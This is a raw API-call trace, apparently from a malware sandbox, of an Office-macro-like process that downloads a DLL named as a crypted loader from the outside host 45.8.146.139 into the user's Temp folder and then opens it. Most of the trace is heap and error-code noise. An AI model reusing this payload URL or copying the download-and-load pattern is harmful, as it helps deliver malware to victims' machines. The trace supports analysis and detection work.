[0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0xca123e8 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x6b) returned 0xc81c908 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x17) returned 0xc6fac58 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x14) returned 0xc6faa98 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xf) returned 0xf6100a8 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x16) returned 0xc6fab58 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2a) returned 0xca00830 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x29) returned 0xca00718 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0xc6fac38 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x21) returned 0xc7f2870 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x16) returned 0xc6fabb8 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x22) returned 0xc7f2d50 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0xc6fabd8 [0114.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x92) returned 0xc820578 [0114.836] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xc72c4e8 | out: hHeap=0x570000) returned 1 [0114.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x80) returned 0xca54b68 [0114.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0xca1d960 [0114.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0xca12410 [0114.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2) returned 0xca1d9b0 [0114.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xca1d9b0 | out: hHeap=0x570000) returned 1 [0114.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2) returned 0xca1d980 [0114.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0xca1d9b0 [0114.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0xc6fac78 [0114.838] GetLastError () returned 0x0 [0114.838] SetLastError (dwErrCode=0x0) [0114.838] GetLastError () returned 0x0 [0114.838] SetLastError (dwErrCode=0x0) [0114.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb8) returned 0xb3e86d8 [0114.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6a6) returned 0xc72c4e8 [0114.838] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xc72c4e8 | out: hHeap=0x570000) returned 1 [0114.838] GetLastError () returned 0x0 [0114.838] SetLastError (dwErrCode=0x0) [0114.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0xca1db60 [0114.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2) returned 0xca1dd00 [0114.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4) returned 0xca1dc80 [0114.839] GetLastError () returned 0x0 [0114.839] SetLastError (dwErrCode=0x0) [0114.839] GetLastError () returned 0x0 [0114.839] SetLastError (dwErrCode=0x0) [0114.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb8) returned 0xb3e7e98 [0114.839] GetLastError () returned 0x0 [0114.839] SetLastError (dwErrCode=0x0) [0114.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6a6) returned 0xc72c4e8 [0114.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xc72c4e8 | out: hHeap=0x570000) returned 1 [0114.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xca1db60 | out: hHeap=0x570000) returned 1 [0114.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xb3e86d8 | out: hHeap=0x570000) returned 1 [0114.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xca1dc80 | out: hHeap=0x570000) returned 1 [0114.839] GetLastError () returned 0x0 [0114.839] SetLastError (dwErrCode=0x0) [0114.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0xca1db30 [0114.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2) returned 0xca1dc80 [0114.839] GetLastError () returned 0x0 [0114.839] SetLastError (dwErrCode=0x0) [0114.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x200) returned 0xc7512d8 [0114.839] GetLastError () returned 0x0 [0114.839] SetLastError (dwErrCode=0x0) [0114.839] GetLastError () returned 0x0 [0114.840] SetLastError (dwErrCode=0x0) [0114.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4) returned 0xca1dc90 [0114.840] GetLastError () returned 0x0 [0114.840] SetLastError (dwErrCode=0x0) [0114.840] GetLastError () returned 0x0 [0114.840] SetLastError (dwErrCode=0x0) [0114.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb8) returned 0xb3e86d8 [0114.840] GetLastError () returned 0x0 [0114.840] SetLastError (dwErrCode=0x0) [0114.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6a6) returned 0xc72c4e8 [0114.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xc72c4e8 | out: hHeap=0x570000) returned 1 [0114.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xca1db30 | out: hHeap=0x570000) returned 1 [0114.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xb3e7e98 | out: hHeap=0x570000) returned 1 [0114.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xca1dc90 | out: hHeap=0x570000) returned 1 [0114.840] GetLastError () returned 0x0 [0114.840] SetLastError (dwErrCode=0x0) [0114.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0xca1db50 [0114.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xca1dc80 | out: hHeap=0x570000) returned 1 [0114.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xca1dd00 | out: hHeap=0x570000) returned 1 [0114.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0xca1dc90 [0114.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0xc9b9088 [0114.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0xca5e240 [0114.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0xca5e678 [0114.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0xca5e480 [0114.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x70) returned 0xc81db50 [0114.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xc81db50 | out: hHeap=0x570000) returned 1 [0114.841] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf54ae98 [0114.841] GetLocalTime (in: lpSystemTime=0x197574 | out: lpSystemTime=0x197574*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x23, wSecond=0x38, wMilliseconds=0x2b)) [0114.841] wsprintfA (in: param_1=0xf54ae98, param_2="%02u:%02u:%02u " | out: param_1="18:35:56 ") returned 9 [0114.841] wsprintfA (in: param_1=0xf54aea1, param_2="Starting download\n" | out: param_1="Starting download\n") returned 18 [0114.842] OutputDebugStringA (lpOutputString="18:35:56 Starting download\n") [0114.842] LocalFree (hMem=0xf54ae98) returned 0x0 [0114.842] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1033) returned 0xf563e40 [0114.843] GetTempPathA (in: nBufferLength=0x1000, lpBuffer=0xf563e60 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0114.844] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="y", uUnique=0x0, lpTempFileName=0xf563e60 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\y144f.tmp")) returned 0x144f [0114.847] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\y144f.tmp")) returned 1 [0114.848] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf54ae98 [0114.848] GetLocalTime (in: lpSystemTime=0x1975d8 | out: lpSystemTime=0x1975d8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x23, wSecond=0x38, wMilliseconds=0x3b)) [0114.848] wsprintfA (in: param_1=0xf54ae98, param_2="%02u:%02u:%02u " | out: param_1="18:35:56 ") returned 9 [0114.848] wsprintfA (in: param_1=0xf54aea1, param_2="Starting download from %s to %s\n" | out: param_1="Starting download from http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp.dll\n") returned 184 [0114.848] OutputDebugStringA (lpOutputString="18:35:56 Starting download from http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp.dll\n") [0114.848] LocalFree (hMem=0xf54ae98) returned 0x0 [0114.848] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x717a0000 [0114.887] URLDownloadToFileA (param_1=0x0, param_2="http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll", param_3="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\y144f.tmp.dll"), param_4=0x0, param_5=0x0) returned 0x0 [0117.090] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf545e70 [0117.090] GetLocalTime (in: lpSystemTime=0x1975c8 | out: lpSystemTime=0x1975c8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x23, wSecond=0x3a, wMilliseconds=0x125)) [0117.090] wsprintfA (in: param_1=0xf545e70, param_2="%02u:%02u:%02u " | out: param_1="18:35:58 ") returned 9 [0117.090] GetLastError () returned 0x0 [0117.091] FormatMessageA (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x19700c, nSize=0x0, Arguments=0x0 | out: lpBuffer="") returned 0x27 [0117.092] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0xca00cc8 [0117.092] LocalFree (hMem=0xc7ef000) returned 0x0 [0117.092] GetLastError () returned 0x0 [0117.092] wsprintfA (in: param_1=0xf545e79, param_2="Finished download from %s to %s: %d %s\n" | out: param_1="Finished download from http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp.dll: 0 Error#0:The operation completed successfully.\r\n\n") returned 235 [0117.092] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xca00cc8 | out: hHeap=0x570000) returned 1 [0117.092] OutputDebugStringA (lpOutputString="18:35:58 Finished download from http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp.dll: 0 Error#0:The operation completed successfully.\r\n\n") [0117.093] LocalFree (hMem=0xf545e70) returned 0x0 [0117.093] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0xca5f128 [0117.093] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x38) returned 0xc6f5fb8 [0117.093] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x76720000 [0117.094] GetProcAddress (hModule=0x76720000, lpProcName="AreFileApisANSI") returned 0x7673f300 [0117.094] AreFileApisANSI () returned 1 [0117.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca5f128, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0117.094] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x66) returned 0xc91f978 [0117.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca5f128, cbMultiByte=-1, lpWideCharStr=0xc91f978, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp.dll") returned 51 [0117.095] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\y144f.tmp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x196ea4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcd4 [0117.095] GetFileType (hFile=0xcd4) returned 0x1 [0117.095] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xc91f978 | out: hHeap=0x570000) returned 1 [0117.096] CloseHandle (hObject=0xcd4) returned 1 [0117.097] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xca5f128 | out: hHeap=0x570000) returned 1 [0117.097] AreFileApisANSI () returned 1 [0117.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf563e60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0117.097] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x66) returned 0xc91f978 [0117.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf563e60, cbMultiByte=-1, lpWideCharStr=0xc91f978, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp.dll") returned 51 [0117.097] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\y144F.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\y144f.tmp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x196ecc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcd4 [0117.097] GetFileType (hFile=0xcd4) returned 0x1 [0117.098] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xc91f978 | out: hHeap=0x570000) returned 1 [0117.098] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0xf547e80 [0117.098] ReadFile (in: hFile=0xcd4, lpBuffer=0xf547e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x196efc, lpOverlapped=0x0 | out: lpBuffer=0xf547e80*, lpNumberOfBytesRead=0x196efc*=0xf6, lpOverlapped=0x0) returned 1 [0117.098] ReadFile (in: hFile=0xcd4, lpBuffer=0xf547e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x196efc, lpOverlapped=0x0 | out: lpBuffer=0xf547e80*, lpNumberOfBytesRead=0x196efc*=0x0, lpOverlapped=0x0) returned 1 [0117.098] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0xf547e80 | out: hHeap=0x570000) returned 1 [0117.098] CloseHandle (hObject=0xcd4) returned 1 [0117.099] GetLastError () returned 0x0 [0117.100] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x769bf350 [0117.100] SetLastError (dwErrCode=0x0) [0117.100] GetLastError () returned 0x0 [0117.100] SetLastError (dwErrCode=0x0) [0117.102] GetLastError () returned 0x0 [0117.102] SetLastError (dwErrCode=0x0) [0117.102] GetLastError () returned 0x0 [0117.102] SetLastError (dwErrCode=0x0) [0117.108] Sleep (dwMilliseconds=0x0) [0117.116] GetAsyncKeyState (vKey=3) returned 0 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.117] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0117.117] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x23, wSecond=0x3a, wMilliseconds=0x144)) [0117.118] Sleep (dwMilliseconds=0x0) [0117.128] GetAsyncKeyState (vKey=3) returned 0 [0117.128] SetErrorMode (uMode=0x8001) returned 0x8001 [0117.128] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1 [0117.128] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0117.129] SetErrorMode (uMode=0x8001) returned 0x8001 [0117.129] GetProcAddress (hModule=0x743d0000, lpProcName="KillTimer") returned 0x74408aa0 [0117.130] KillTimer (hWnd=0x0, uIDEvent=0x7f71) returned 1 [0117.130] GetLastError () returned 0x0 [0117.132] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.132] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.132] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.132] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x1 [0117.133] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.133] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.133] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.133] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.133] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0117.133] CreateBindCtx (in: reserved=0x0, ppbc=0x197808 | out: ppbc=0x197808*=0xc6f56f8) returned 0x0 [0117.134] MkParseDisplayName (in: pbc=0xc6f56f8, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x19780c, ppmk=0x197810 | out: pchEaten=0x19780c, ppmk=0x197810*=0xc6f63b8) returned 0x0 [0117.135] IUnknown:Release (This=0xc6f56f8) returned 0x0 [0117.135] BindMoniker (in: pmk=0xc6f63b8, grfOpt=0x0, iidResult=0x69348088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x197804 | out: ppvResult=0x197804*=0x8cec664) returned 0x0 [0117.135] IUnknown:Release (This=0xc6f63b8) returned 0x0 [0117.138] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197bac | out: ppsaOut=0x197bac) returned 0x0 [0117.138] SafeArrayAllocData (psa=0xc7ef0d0) returned 0x0 [0117.144] SafeArrayDestroyData (psa=0xc7ef0d0) returned 0x0 [0117.144] SafeArrayDestroyDescriptor (psa=0xc7ef0d0) returned 0x0 [0117.151] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.151] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.151] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.151] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x1 [0117.152] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.152] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.152] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.152] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.152] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0117.152] CreateBindCtx (in: reserved=0x0, ppbc=0x197808 | out: ppbc=0x197808*=0xc6f5d38) returned 0x0 [0117.153] MkParseDisplayName (in: pbc=0xc6f5d38, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x19780c, ppmk=0x197810 | out: pchEaten=0x19780c, ppmk=0x197810*=0xc6f6278) returned 0x0 [0117.153] IUnknown:Release (This=0xc6f5d38) returned 0x0 [0117.153] BindMoniker (in: pmk=0xc6f6278, grfOpt=0x0, iidResult=0x69348088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x197804 | out: ppvResult=0x197804*=0x8cec664) returned 0x0 [0117.154] IUnknown:Release (This=0xc6f6278) returned 0x0 [0117.157] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197bac | out: ppsaOut=0x197bac) returned 0x0 [0117.157] SafeArrayAllocData (psa=0xc7ef010) returned 0x0 [0117.161] SafeArrayDestroyData (psa=0xc7ef010) returned 0x0 [0117.161] SafeArrayDestroyDescriptor (psa=0xc7ef010) returned 0x0 [0117.166] SafeArrayDestroyData (psa=0xb3bf358) returned 0x0 [0117.178] SafeArrayAllocData (psa=0xb3bf358) returned 0x0 [0117.178] SafeArrayDestroyData (psa=0xb3bf358) returned 0x0 [0117.178] SafeArrayDestroyDescriptor (psa=0xb3bf358) returned 0x0 Thread: id = 17 os_tid = 0xd74 Thread: id = 18 os_tid = 0xd50 Thread: id = 19 os_tid = 0x820